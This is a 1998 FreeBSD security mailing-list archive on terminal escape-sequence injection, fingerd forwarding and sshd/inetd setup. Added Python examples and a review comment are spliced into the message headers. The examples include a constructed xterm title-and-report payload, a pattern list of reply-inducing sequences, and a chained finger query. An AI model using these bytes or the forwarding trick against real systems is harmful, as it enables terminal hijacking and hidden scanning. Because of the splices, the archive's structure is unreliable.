Subject: Re: terminal escape exploit (was Re: cat exploit)
Cc: security@FreeBSD.ORG
In-reply-to: Your message of "Fri, 11 Sep 1998 14:06:54 +0400." <199809111006.OAA04817@paranoid.eltex.spb.ru>
References: <199809111006.OAA04817@paranoid.eltex.spb.ru>
Date: Fri, 11 Sep 1998 16:42:32 -0600
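Robert Watson's point in the message above is that the defence belongs in the program that displays untrusted data, not in the terminal: `more` and `cat -v` already neutralise control bytes, and biff was fixed the same way. The Python below is an added example written for this page (not code from the thread, from FreeBSD or from xterm) showing the two things such a program can do. `make_safe` renders bytes the way `cat -v` does, so every control byte, ESC included, becomes visible text that cannot start an escape sequence; `find_terminal_queries` flags the xterm sequences that make the terminal write back into the input stream, which is the mechanism behind the `xtermxterm` noise discussed earlier: OSC 0/2 sets the window title, CSI 21 t asks xterm to report it, CSI c asks for device attributes, and ENQ asks for the answerback string. The `1;2c` Steve Reid saw reads, on this interpretation, as the tail of a VT100-style device-attributes reply (ESC [ ? 1 ; 2 c) after the shell consumed the leading bytes. The sample input and the labels are this example's own constructions.

```python
"""Display-side defences against terminal escape injection (added example)."""
import re

# xterm control sequences that make the terminal send bytes back as if typed,
# or that plant the payload such a reply carries.  Labels are this example's own.
QUERY_PATTERNS = (
    (re.compile(rb"\x1b\](?:0|2);[^\x07\x1b]*(?:\x07|\x1b\\)"), "OSC 0/2: set window title (payload)"),
    (re.compile(rb"\x1b\[21t"), "CSI 21 t: report window title"),
    (re.compile(rb"\x1b\[\??[0-9;]*c"), "CSI c: request device attributes"),
    (re.compile(rb"\x05"), "ENQ: request answerback string"),
)


def find_terminal_queries(data):
    """Return the labels of reply-inducing sequences in data, in order of appearance."""
    hits = []
    for pattern, label in QUERY_PATTERNS:
        hits.extend((m.start(), label) for m in pattern.finditer(data))
    return [label for _, label in sorted(hits)]


def make_safe(data):
    """Render bytes as cat -v does: control bytes become ^X, DEL becomes ^?,
    bytes with the high bit set get an M- prefix (so 8-bit C1 controls such as
    0x9b CSI show as M-^[).  Tab and newline pass through unchanged."""
    out = []
    for b in data:
        prefix = ""
        if b >= 0x80:
            prefix, b = "M-", b - 0x80
        if b in (0x09, 0x0A) and not prefix:
            out.append(chr(b))
        elif b < 0x20:
            out.append(prefix + "^" + chr(b + 0x40))
        elif b == 0x7F:
            out.append(prefix + "^?")
        else:
            out.append(prefix + chr(b))
    return "".join(out)


# Constructed sample: a "text" file that sets the title to a command name, asks
# the terminal to type the title back, then asks for device attributes.
SAMPLE = (b"Nothing to see here\n"
          b"\x1b]2;xtermxterm\x07"
          b"\x1b[21t"
          b"\x1b[c\n")


def display(data):
    """What a cautious pager does: report the queries found, then show the safe rendering."""
    return find_terminal_queries(data), make_safe(data)


if __name__ == "__main__":
    queries, text = display(SAMPLE)
    for q in queries:
        print("suspicious:", q)
    print(text)
```

Running the block prints three warnings and then the file with `^[]2;xtermxterm^G^[[21t^[[c` spelled out on screen instead of executed by the terminal. The detector is a triage aid only; the rendering step is the actual control, because it does not depend on knowing every sequence a given emulator answers.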
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <199809111006.OAA04817@paranoid.eltex.spb.ru> ark@eltex.ru writes:
: Oh really? afair vt52 was too dumb and had no programmable keys and
: only responces you could get back from it were screen cursor position and
: some simple status info. You need vt100 at least.

I'm nearly positive that the VT52 (and the VT50) allowed for an
"answerback" string that could be set in software. I seem to recall
writing some code to take advantage of this back when I was in high
school for a company doing VMS 3.4 and RSTS/E 6.3 or 7.0. However, my
memory is dim about this, since it might have just been a terminal type
detection....

Warner

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 17:29:11 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA03582 for freebsd-security-outgoing; Fri, 11 Sep 1998 17:29:11 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA03572 for ; Fri, 11 Sep 1998 17:29:05 -0700 (PDT) (envelope-from mike@seidata.com)
Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id UAA09124; Fri, 11 Sep 1998 20:27:56 -0400 (EDT)
Date: Fri, 11 Sep 1998 20:27:55 -0400 (EDT)
From: Mike
To: Hector Gonzalez Jaime
cc: Lutz Rabing , security@FreeBSD.ORG
Subject: Re: fingerd exploit
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 11 Sep 1998, Hector Gonzalez Jaime wrote:

> finger user@host.one@host.two@host.three@so.on

FWIW, I believe 'secure finger' takes care of this. I don't recall the
exact URL for it right now, but it reportedly takes care of a lot of
'problems' with the standard fingerd. It does have some oddities of its
own, IMO, such as storing user plan files, etc. in a dedicated directory,
etc. I ran this for awhile when I was using 2.2.7. When I went up to
-current, I just kept the default fingerd.

Anyone have a suggestion re: the best fingerd to run?

-mike

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 17:30:53 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA03968 for freebsd-security-outgoing; Fri, 11 Sep 1998 17:30:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA03956 for ; Fri, 11 Sep 1998 17:30:49 -0700 (PDT) (envelope-from mike@seidata.com)
Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id UAA09453; Fri, 11 Sep 1998 20:29:43 -0400 (EDT)
Date: Fri, 11 Sep 1998 20:29:43 -0400 (EDT)
From: Mike
To: Michal Listos
cc: Hector Gonzalez Jaime , security@FreeBSD.ORG
Subject: Re: fingerd exploit
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 11 Sep 1998, Michal Listos wrote:

>      -s      Enable secure mode.  Queries without a user name are rejected and
>              forwarding of queries to other remote hosts is denied.

*ding* The magic answer... it seems '-s' gives you all the pluses of
secure fingerd, and it appears to be the default with -current.

-mike

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 20:16:23 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA18076 for freebsd-security-outgoing; Fri, 11 Sep 1998 20:16:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA18070 for ; Fri, 11 Sep 1998 20:16:22 -0700 (PDT) (envelope-from sendmail@roble.com)
Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id UAA10786 for ; Fri, 11 Sep 1998 20:16:08 -0700 (PDT)
Date: Fri, 11 Sep 1998 20:16:08 -0700 (PDT)
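The `-s` option Michal quoted and Hector's `user@host.one@host.two` example describe the same protocol feature from two sides. In RFC 1288 a query line is either `[/W] [user]` or `[/W ] [user]@host[@host...]`; a server that honours the second form strips the last `@host`, sends the remainder there and relays the answer, so each hop sees only the hop before it. That is what makes forwarding useful for hiding the origin of a scan, and why `-s` turns it off. The Python below is an added example written for this page, not FreeBSD's fingerd; it parses request lines according to the RFC grammar, applies the two `-s` checks from the manual text quoted above (no user name, any `@` in the query), and walks a forwarding chain to show what each relay would receive. The request lines are constructed.

```python
"""finger (RFC 1288) request parsing with the fingerd -s policy checks (added example)."""


def parse_finger_request(line):
    """Split one request line into (verbose, targets, forwarded).

    RFC 1288:  {Q1} ::= [/W] [user] CRLF
               {Q2} ::= [/W ] [user]@host[@host ...] CRLF
    Tokens are whitespace separated; '/W' (RFC 742 also allowed '/w') asks
    for verbose output and is not itself a user name.
    """
    verbose, targets, forwarded = False, [], False
    for tok in line.rstrip("\r\n").split():
        if tok.lower() == "/w":
            verbose = True
            continue
        if "@" in tok:                    # {Q2}: user@host or @host chains
            forwarded = True
        targets.append(tok)
    return verbose, targets, forwarded


def decide(line, secure):
    """Return 'serve' or a rejection reason.  With secure=True this applies the
    two checks the fingerd manual lists for -s: no query without a user name,
    and no forwarding of queries to other remote hosts."""
    verbose, targets, forwarded = parse_finger_request(line)
    if secure:
        if not targets:
            return "reject: query without a user name"
        if forwarded:
            return "reject: forwarding of queries to other remote hosts is denied"
    return "serve (verbose)" if verbose else "serve"


def next_hop(query):
    """What a forwarding fingerd does with a {Q2} query: split off the last
    @host and send the rest of the query to that host."""
    rest, host = query.rsplit("@", 1)
    return rest, host


def forwarding_chain(query):
    """Follow a chained query as the servers would, returning
    [(host contacted, query it receives), ...].  The last entry is the host
    that finally answers; it sees only the relay directly before it."""
    chain = []
    while "@" in query:
        query, host = next_hop(query)
        chain.append((host, query))
    return chain


# Constructed request lines, as they would arrive on TCP port 79.
SAMPLE_REQUESTS = [
    "\r\n",                          # everyone on the system
    "/W\r\n",                        # everyone, verbose
    "root\r\n",
    "/W root\r\n",
    "user@host.one@host.two\r\n",    # forward via host.two to host.one
]


def audit(requests, secure):
    """Return {request: decision} for a list of raw request lines."""
    return {r.rstrip("\r\n"): decide(r, secure) for r in requests}


if __name__ == "__main__":
    for flag in (False, True):
        print("fingerd" + (" -s" if flag else "") + ":")
        for req, verdict in audit(SAMPLE_REQUESTS, flag).items():
            print(f"  {req!r:28} -> {verdict}")
    for host, q in forwarding_chain("user@host.one@host.two@host.three"):
        print(f"{host} receives {q!r}")
```

With `secure=False` every sample line is served, including the bare CRLF that lists all logged-in users and the chained query that turns the host into a relay; with `secure=True` only `root` and `/W root` get through, which is the behaviour Michal's manual excerpt describes.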
From: Roger Marquis To: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <20262.905499048@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Jordan K. Hubbard wrote: > Because you have your files in the wrong place - if you read the man page > for tcpd, you'll see that the permission files live in /usr/local/etc/hosts.* The 2.2.6 man pages incorrectly identify /etc as the location of hosts.{allow,deny}. FWIW, /etc is the default location on every *other* Unix operating system. When I first ran into this bug (back around 1.0.5) we had to `strings tcpd` to find where the access files were expected to be. This is one of the many FreeBSD ports that (IMHO) offer no advantages over the original package. > Which isn't started from inetd.conf. It's started from /usr/local/etc/rc.d/ > when the system boots; nothing rogue about it. The recommended sshd startup method used to be /etc/rc*(/*), probably for historical reasons. It may still be a good idea on slow CPUs, where it can take a while to generate a session key, or where inetd.conf isn't running, however, in my experience, sshd is much more reliably run from inetd. 
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Fri Sep 11 21:10:42 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA21326 for freebsd-security-outgoing; Fri, 11 Sep 1998 21:10:42 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA21321 for ; Fri, 11 Sep 1998 21:10:38 -0700 (PDT) (envelope-from jkh@time.cdrom.com)
Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id VAA23356; Fri, 11 Sep 1998 21:10:32 -0700 (PDT) (envelope-from jkh@time.cdrom.com)
To: Roger Marquis
cc: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-reply-to: Your message of "Fri, 11 Sep 1998 20:16:08 PDT."
Date: Fri, 11 Sep 1998 21:10:32 -0700
Message-ID: <23352.905573432@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> The 2.2.6 man pages incorrectly identify /etc as the location of
> hosts.{allow,deny}. FWIW, /etc is the default location on every

This was fixed.

> were expected to be. This is one of the many FreeBSD ports that (IMHO)
> offer no advantages over the original package.

They're not necessarily supposed to offer any "advantage" over the original, simply to offer convenient one stop shopping for people looking for it. In any case, the whole /etc vs /usr/local/etc argument has already come and gone in this mailing list several times so I won't revive it. :)

> The recommended sshd startup method used to be /etc/rc*(/*), probably
> for historical reasons. It may still be a good idea on slow CPUs,
> where it can take a while to generate a session key, or where
> inetd.conf isn't running, however, in my experience, sshd is much more
> reliably run from inetd.

I haven't had that experience myself, so I guess it's one of those different strokes kinda issues.

- Jordan

From owner-freebsd-security Fri Sep 11 22:33:45 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA27615 for freebsd-security-outgoing; Fri, 11 Sep 1998 22:33:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA27610 for ; Fri, 11 Sep 1998 22:33:41 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id BAA11759; Sat, 12 Sep 1998 01:33:09 -0400 (EDT)
Date: Sat, 12 Sep 1998 01:33:09 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: "Jordan K. Hubbard"
cc: Roger Marquis , freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To: <23352.905573432@time.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 11 Sep 1998, Jordan K. Hubbard wrote:

> > The recommended sshd startup method used to be /etc/rc*(/*), probably
> > for historical reasons. It may still be a good idea on slow CPUs,
> > where it can take a while to generate a session key, or where
> > inetd.conf isn't running, however, in my experience, sshd is much more
> > reliably run from inetd.
>
> I haven't had that experience myself, so I guess it's one of those
> different strokes kinda issues.

The one funny thing I've experienced with sshd (+kerberosIV/AFS patches) is that every hour during key regeneration, no one can log in. Connections are accepted via TCP, and the SSH version number banner is passed back, but no logins are allowed during the key generation (users get a login refused of some kind). I believe that is the event that results in this effect. Running it from inetd might improve that arrangement, but on my slower machines the key generation time from running it out of inetd would really suck. :) I keep meaning to track this down but haven't yet.

Robert N Watson
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
SafePort Network Services             http://www.safeport.com/
robert@fledge.watson.org              http://www.watson.org/~robert/

From owner-freebsd-security Fri Sep 11 22:34:57 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA27662 for freebsd-security-outgoing; Fri, 11 Sep 1998 22:34:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from drwho.xnet.com (drwho.xnet.com [205.243.140.183]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA27655 for ; Fri, 11 Sep 1998 22:34:55 -0700 (PDT) (envelope-from drwho@drwho.xnet.com)
Received: (from drwho@localhost) by drwho.xnet.com (8.8.8/8.8.8) id MAA16433; Fri, 11 Sep 1998 12:44:31 -0500 (CDT) (envelope-from drwho)
Message-ID: <19980911124430.A15005@drwho.xnet.com>
Date: Fri, 11 Sep 1998 12:44:30 -0500
From: Michael Maxwell
To: security@FreeBSD.ORG
Subject: Re: cat exploit
Mail-Followup-To: security@FreeBSD.ORG
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.91i
In-Reply-To: ; from patl@phoenix.volant.org on Thu, Sep 10, 1998 at 10:57:59AM -0700
X-Useless-Header: http://www.xnet.com/~drwho/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 10, 1998 at 10:57:59AM -0700, patl@phoenix.volant.org wrote:

> No, I usually 'less', 'more', or even 'emacs' it. For two reasons.
> 1) INSTALL is usually too large to fit in a single terminal window;
> sometimes too large to fit in the default scrollbuffer. 2) It
> might contain characters that would make my terminal window do
> something I'd rather it didn't...

And another solution that has thus far been forgotten: file(1). I use this routinely, on systems that have it, before I "cat" or "more" a file...

--
drwho @ xnet.com -- http://www.xnet.com/~drwho/
"Freedom of government is good, but freedom FROM government is better."

From owner-freebsd-security Fri Sep 11 23:42:33 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA04048 for freebsd-security-outgoing; Fri, 11 Sep 1998 23:42:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from aniwa.sky (pppk-16.igrin.co.nz [202.49.245.95]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA04000 for ; Fri, 11 Sep 1998 23:42:20 -0700 (PDT) (envelope-from andrew@squiz.co.nz)
Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id SAA05389; Sat, 12 Sep 1998 18:41:42 +1200 (NZST) (envelope-from andrew@squiz.co.nz)
Date: Sat, 12 Sep 1998 18:41:41 +1200 (NZST)
From: Andrew McNaughton
X-Sender: andrew@aniwa.sky
Reply-To: andrew@squiz.co.nz
To: Michael Maxwell
cc: security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To: <19980911124430.A15005@drwho.xnet.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 11 Sep 1998, Michael Maxwell wrote:

> On Thu, Sep 10, 1998 at 10:57:59AM -0700, patl@phoenix.volant.org wrote:
> > No, I usually 'less', 'more', or even 'emacs' it. For two reasons.
> > 1) INSTALL is usually too large to fit in a single terminal window;
> > sometimes too large to fit in the default scrollbuffer. 2) It
> > might contain characters that would make my terminal window do
> > something I'd rather it didn't...
>
> And another solution that has thus far been forgotten: file(1). I use this
> routinely, on systems that have it, before I "cat" or "more" a file...

Not reliable. By way of a test I just created a largish text file with some binary data tacked on the end, and file(1) described it as ASCII text.

Andrew McNaughton

From owner-freebsd-security Sat Sep 12 02:33:57 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA14462 for freebsd-security-outgoing; Sat, 12 Sep 1998 02:33:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id CAA14457 for ; Sat, 12 Sep 1998 02:33:55 -0700 (PDT) (envelope-from sthaug@nethelp.no)
From: sthaug@nethelp.no
Received: (qmail 12397 invoked by uid 1001); 12 Sep 1998 09:33:41 +0000 (GMT)
To: marquis@roble.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To: Your message of "Fri, 11 Sep 1998 20:16:08 -0700 (PDT)"
References:
X-Mailer: Mew version 1.05+ on Emacs 19.34.2
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Date: Sat, 12 Sep 1998 11:33:41 +0200
Message-ID: <12395.905592821@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> The recommended sshd startup method used to be /etc/rc*(/*), probably
> for historical reasons. It may still be a good idea on slow CPUs,
> where it can take a while to generate a session key, or where
> inetd.conf isn't running, however, in my experience, sshd is much more
> reliably run from inetd.

I believe it *is* still the recommended method, even on faster CPUs. I've used SSH since it came out, and I've found starting from /etc/rc*(/*) to be very reliable. I actually have several machines whose *only* possibility of remote login is through ssh. It just runs and runs...
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Sat Sep 12 04:13:19 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA23283 for freebsd-security-outgoing; Sat, 12 Sep 1998 04:13:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA23278 for ; Sat, 12 Sep 1998 04:13:17 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id NAA19248; Sat, 12 Sep 1998 13:18:09 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk)
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id NAA18957; Sat, 12 Sep 1998 13:25:53 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id NAA19063; Sat, 12 Sep 1998 13:16:16 +0200 (CEST)
Message-ID: <19980912131616.56832@deepo.prosa.dk>
Date: Sat, 12 Sep 1998 13:16:16 +0200
From: Philippe Regnauld
To: andrew@squiz.co.nz
Cc: Jay Tribick , freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.88e
In-Reply-To: ; from Andrew McNaughton on Fri, Sep 11, 1998 at 07:39:59AM +1200
X-Operating-System: FreeBSD 2.2.6-RELEASE i386
Phone: +45 3336 4148
Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Andrew McNaughton writes:
>
> This is the key point. If you could get something executed merely by
> having it passed to a terminal then all sorts of exploits presumably
> become possible.

They have been for years. I'm sure you can find some horror stories about vtXXX terminals being manipulated with weird esc-sequences.

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
The Internet is busy. Please try again later.

From owner-freebsd-security Sat Sep 12 04:21:58 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA23988 for freebsd-security-outgoing; Sat, 12 Sep 1998 04:21:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA23981 for ; Sat, 12 Sep 1998 04:21:55 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id NAA19293; Sat, 12 Sep 1998 13:27:07 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk)
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id NAA18964; Sat, 12 Sep 1998 13:34:52 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id NAA19109; Sat, 12 Sep 1998 13:25:12 +0200 (CEST)
Message-ID: <19980912132511.46246@deepo.prosa.dk>
Date: Sat, 12 Sep 1998 13:25:11 +0200
From: Philippe Regnauld
To: Mark Valentine
Cc: security@FreeBSD.ORG
Subject: file(1) exploit ? (Was: cat exploit)
References: <199809110121.CAA04444@thuvia.demon.co.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.88e
In-Reply-To: <199809110121.CAA04444@thuvia.demon.co.uk>; from Mark Valentine on Fri, Sep 11, 1998 at 02:21:41AM +0100
X-Operating-System: FreeBSD 2.2.6-RELEASE i386
Phone: +45 3336 4148
Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Mark Valentine writes:
>
> file(1) isn't safe, e.g. try it on a file which starts:
>
> #! ^E
>
> (Replace ^E with a real control char.)

Wow.

    % echo "#! ^E" >xxxxx
    % file xxxxx
    xxxxx: commands text for
    % 1;2c _
           ^ cursor here

Obviously, that's not good.

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
The Internet is busy. Please try again later.

From owner-freebsd-security Sat Sep 12 08:44:16 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA11988 for freebsd-security-outgoing; Sat, 12 Sep 1998 08:44:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from baerenklau.de.freebsd.org (baerenklau.de.freebsd.org [195.185.195.14]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA11983 for ; Sat, 12 Sep 1998 08:44:13 -0700 (PDT) (envelope-from wosch@panke.de.freebsd.org)
Received: (from uucp@localhost) by baerenklau.de.freebsd.org (8.8.8/8.8.8) with UUCP id RAA23838 for security@freebsd.org; Sat, 12 Sep 1998 17:44:00 +0200 (CEST) (envelope-from wosch@panke.de.freebsd.org)
Received: (from wosch@localhost) by campa.panke.de (8.8.8/8.8.8) id PAA01992 for security@freebsd.org; Sat, 12 Sep 1998 15:05:23 +0200 (MET DST) (envelope-from wosch)
Message-ID: <19980912150521.A1985@panke.de>
Date: Sat, 12 Sep 1998 15:05:22 +0200
From: Wolfram Schneider
To: security@FreeBSD.ORG
Subject: unlimited fingerd in /etc/inetd.conf
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.1i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I think we should not run an unlimited fingerd(8) from inetd by default. With this patch inetd runs only 3 simultaneous fingerd processes and limits the connections-per-ip-per-minute to 10.

Index: inetd.conf
===================================================================
RCS file: /usr/cvs/src/etc/inetd.conf,v
retrieving revision 1.29
diff -u -r1.29 inetd.conf
--- inetd.conf 1998/09/02 01:34:56 1.29
+++ inetd.conf 1998/09/12 12:57:13
@@ -8,7 +8,7 @@ telnet stream tcp nowait root /usr/libexec/telnetd telnetd shell stream tcp nowait root /usr/libexec/rshd rshd login stream tcp nowait root /usr/libexec/rlogind rlogind -finger stream tcp nowait nobody /usr/libexec/fingerd fingerd -s +finger stream tcp nowait/3/10 nobody /usr/libexec/fingerd fingerd -s #exec stream tcp nowait root /usr/libexec/rexecd rexecd #uucpd stream tcp nowait root /usr/libexec/uucpd uucpd #nntp stream tcp nowait usenet /usr/libexec/nntpd nntpd

--
Wolfram Schneider http://www.freebsd.org/~w/

From owner-freebsd-security Sat Sep 12 18:01:59 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA02499 for freebsd-security-outgoing; Sat, 12 Sep 1998 18:01:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA02485 for ; Sat, 12 Sep 1998 18:01:52 -0700 (PDT) (envelope-from dag-erli@ifi.uio.no)
Received: from hvergelmir.ifi.uio.no (2602@hvergelmir.ifi.uio.no [129.240.64.129]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id DAA15207; Sun, 13 Sep 1998 03:01:35 +0200 (MET DST)
Received: (from dag-erli@localhost) by hvergelmir.ifi.uio.no ; Sun, 13 Sep 1998 03:01:35 +0200 (MET DST)
Mime-Version: 1.0
To: Roger Marquis
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
References:
Organization: University of Oslo, Department of Informatics
X-url: http://www.stud.ifi.uio.no/~dag-erli/
X-other-addresses: 'finger dag-erli@ifi.uio.no' for a list
X-disclaimer-1: The views expressed in this article are mine alone, and do
X-disclaimer-2: not necessarily coincide with those of any organisation or
X-disclaimer-3: company with which I am or have been affiliated.
X-Stop-Spam: http://www.cauce.org/
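Review bot: the `nowait/3/10` edit caps only the finger line, while telnetd, rshd and rlogind in the same hunk context stay plain `nowait` with no child or per-IP limit; the message explains what the two numbers mean (at most 3 simultaneous fingerd processes, 10 connections per IP per minute) but nothing in the file does, so a comment above the finger line, or a pointer to the inetd.conf field syntax in the commit text, would spare the next editor a guess. The rationale should also say that this is a resource limit and not access control: `-s` still decides which queries fingerd answers, and with only 3 child slots three slow or stalled clients occupy the service for everyone else until they exit, which is an acceptable trade for finger but ought to be a stated one.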
From: dag-erli@ifi.uio.no (Dag-Erling Coïdan Smørgrav)
Date: 13 Sep 1998 03:01:34 +0200
In-Reply-To: Roger Marquis's message of "Fri, 11 Sep 1998 20:16:08 -0700 (PDT)"
Message-ID:
Lines: 15
X-Mailer: Gnus v5.5/Emacs 19.34
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
